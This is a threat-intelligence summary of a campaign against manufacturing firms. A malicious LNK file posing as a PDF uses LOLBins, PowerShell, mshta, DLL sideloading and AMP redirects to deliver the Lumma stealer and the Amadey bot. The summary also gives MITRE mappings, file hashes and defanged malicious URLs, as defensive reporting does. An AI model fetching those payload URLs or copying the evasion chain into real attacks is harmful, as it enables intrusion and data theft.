Summary:
A recent cyberattack campaign targeting the manufacturing sector has been identified, utilizing a malicious LNK file disguised as a PDF. The attackers leverage various Living-off-the-Land Binaries and sophisticated evasion techniques to deploy the Lumma stealer and Amadey bot, aiming to exfiltrate sensitive information. #ManufacturingSecurity #MaliciousLNK #CyberThreats
A recent cyberattack campaign targeting the manufacturing sector has been identified, utilizing a malicious LNK file disguised as a PDF. The attackers leverage various Living-off-the-Land Binaries and sophisticated evasion techniques to deploy the Lumma stealer and Amadey bot, aiming to exfiltrate sensitive information. #ManufacturingSecurity #MaliciousLNK #CyberThreats
Keypoints:
Cyble Research and Intelligence Labs (CRIL) discovered a malicious campaign targeting the manufacturing industry.
The attack uses a deceptive LNK file disguised as a PDF to initiate infection.
Multiple Living-off-the-Land Binaries (LOLBins) are employed to bypass security mechanisms.
Google Accelerated Mobile Pages (AMP) URLs are utilized to evade detection.
File injection techniques are heavily relied upon to execute malicious payloads in memory.
The attack chain includes DLL sideloading and the use of IDATLoader to deploy Lumma stealer and Amadey bot.
The initial infection vector is suspected to be a spear-phishing email.
Malicious PowerShell commands are executed to fetch and run additional payloads from remote servers.
The campaign demonstrates increasing sophistication in cyberattack methodologies.
MITRE Techniques
Phishing (T1566): The LNK file may be delivered through phishing or spam emails.
User Execution: Malicious Link (T1204.001): Execution begins when a user executes the LNK file.
Command and Scripting Interpreter: PowerShell (T1059.001): The LNK file executes PowerShell commands.
Masquerading: Masquerade File Type (T1036.008): Uses LNK files with altered icons to disguise as legitimate.
System Binary Proxy Execution: Mshta (T1218.005): Abuse mshta.exe to proxy execution of malicious files.
Obfuscated Files or Information (T1027): Scripts include packed or encrypted data.
System Binary Proxy Execution: Msiexec (T1218.007): msiexec.exe used for proxy execution of malicious payloads.
DLL Side-Loading (T1574.002): Malicious DLL sideloaded.
Process Injection (T1055): Injects malicious content into explorer.exe and other processes.
Scheduled Task/Job (T1053.005): Adds task scheduler entry for persistence.
Application Layer Protocol (T1071): Malware communicates to the C&C server.
Automated Exfiltration (T1020): Data is exfiltrated after collection.
IoC:
[SHA-256] 5b6dc2ecb0f7f2e1ed759199822cb56f5b7bd993f3ef3dab0744c6746c952e36
[SHA-256] 8ed1af83cf70b363658165a339f45ae22d92c51841b06c568049d3636a04a2a8
[SHA-256] 7b8958ed2fc491b8e43ffb239cdd757ec3d0db038a6d6291c0fd6eb2d977adc4
[SHA-256] dc36a3d95d9a476d773b961b15b188aa3aae0e0a875bca8857fca18c691ec250
[URL] hxxps://www.google[.]ca/amp/s/goo.su/IwPQJP
[URL] hxxps://pastebin[.]com/raw/0v6Vhvpb
[URL] hxxps://berb.fitnessclub-filmfanatics[.]com/naailq0.cpl
[URL] hxxp://download-695-18112-001-webdav-logicaldoc[.]cdn-serveri4732-ns.shop/Downloads/18112.2022/
Full Research: https://cyble.com/blog/threat-actor-targets-manufacturing-industry-with-malware/